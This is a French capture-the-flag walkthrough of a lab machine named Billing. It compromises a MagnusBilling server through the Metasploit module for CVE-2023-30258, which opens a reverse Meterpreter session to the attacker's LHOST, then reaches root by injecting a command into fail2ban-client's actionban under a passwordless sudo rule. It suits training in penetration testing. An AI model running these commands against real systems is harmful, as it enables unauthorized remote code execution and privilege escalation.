
Un guide détaillé de l'exploitation de Billing room via CVE-2023-30258 et de l'escalade de privilèges via une mauvaise configuration de fail2ban.
Écrit par : Aditya Bhatt | Contributeur Open Source
Dans cette procédure, nous attaquons de plein fouet la salle Billing, mettant en avant une instance MagnusBilling vulnérable, une juteuse RCE sans authentification (CVE-2023-30258), et une mauvaise configuration sudo de fail2ban qui crie « root me ».
Cette salle mélange magnifiquement l'exploitation automatisée avec une escalade de privilèges créative, nous offrant un aperçu pratique des failles du monde réel cachées dans les logiciels de facturation VoIP. Nous passerons de la reconnaissance initiale au shell root avec un PoC complet, des commentaires et une ambiance 🗿.
Après avoir déployé la machine, la première chose qui vous frappe comme un pare-feu mal configuré :
http://<IP_machine>/mbilling/
C'est la page de connexion de MagnusBilling. Cela seul déclenche des sonnettes — vous savez que vous allez jouer avec un juteux CVE.
Nous commençons avec le combo de reconnaissance ultime :
nmap -A -sV -p- 10.10.115.173
🧠 Résultats :
/mbilling/Ensuite, nous passons en brute force avec Gobuster :
gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
🧠 Résultats :
Ensuite, nous vérifions le robots.txt du site pour voir s'il y a quelque chose d'intéressant :
User-agent: *
Disallow: /mbilling/
Hmm… essayer de le cacher ne fait que nous le faire désirer plus 😈
Un test rapide avec netcat confirme qu'il répond avec :
Response: Error
Message: Missing action in request
Ce qui confirme davantage : le backend est MagnusBilling, et le port est lié à Asterisk Call Manager. Il est temps d'invoquer nos arts sombres 🧙
Exploit : Exécution de code à distance non authentifiée dans MagnusBilling Module :
exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
Lancez Metasploit :
msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
Ensuite, vérifiez les prérequis :
show options
Ensuite, configurez ce qui suit :
set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run
Quelques secondes plus tard… Boom. Nous avons une session Meterpreter !
shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64
Essayé de lancer un shell TTY :
python3 -c 'import pty; pty.spawn("/bin/bash")'
Nous commençons à remonter avec :
cd ..
cd ..
Jusqu'à ce que nous trouvions :
cd /home/magnus
cat user.txt
Sympa ! Mais nous n'avons pas fini. Il nous faut root, et Magnus nous murmure des secrets.
Vérifions ce que nous pouvons exécuter avec sudo :
sudo -l
Résultat :
(ALL) NOPASSWD: /usr/bin/fail2ban-client
Maintenant, ça c'est 🔥. Nous pouvons abuser de fail2ban-client pour exécuter des commandes en tant que root en utilisant les actions de bannissement.
Redémarrons fail2ban :
sudo /usr/bin/fail2ban-client restart
Ensuite, injectons la commande pour voler le flag root :
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"
Déclenchez le bannissement (et donc la commande) :
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1
Ensuite :
cat /tmp/root.txt
Rooté. Comme. Un. Boss. 🗿🔥
robots.txt et fouillez les ports étranges.fail2ban-client) sont tout aussi dangereux.Cette machine était un bel équilibre entre exploitation automatisée et créativité manuelle post-exploitation. De la RCE MagnusBilling au rooting via fail2ban, elle touche toutes les bonnes notes pour la playlist d'un pentester 🎧🎯
Que vous soyez un débutant cherchant à monter en niveau ou un guerrier chevronné collectionnant les flags — celle-ci est un must-pwn.
À la prochaine, Restez dangereux. Restez curieux. Restez majestueux. 🗿
| 🔎 Stage | 💥 Action/Tool Used |
|---|
| Accès initial | Découverte du portail /mbilling et du port 5038 avec Nmap + Gobuster |
| Découverte en reconnaissance | MagnusBilling CMS + Asterisk Call Manager |
| Exploitation | CVE-2023-30258 via Metasploit → shell Meterpreter |
| Énumération | Localisation de /home/magnus/user.txt |
| Escalade de privilèges | Abus de sudo NOPASSWD sur fail2ban-client → RCE en tant que root |
| Flag root | Récupération de /root/root.txt via injection de payload fail2ban |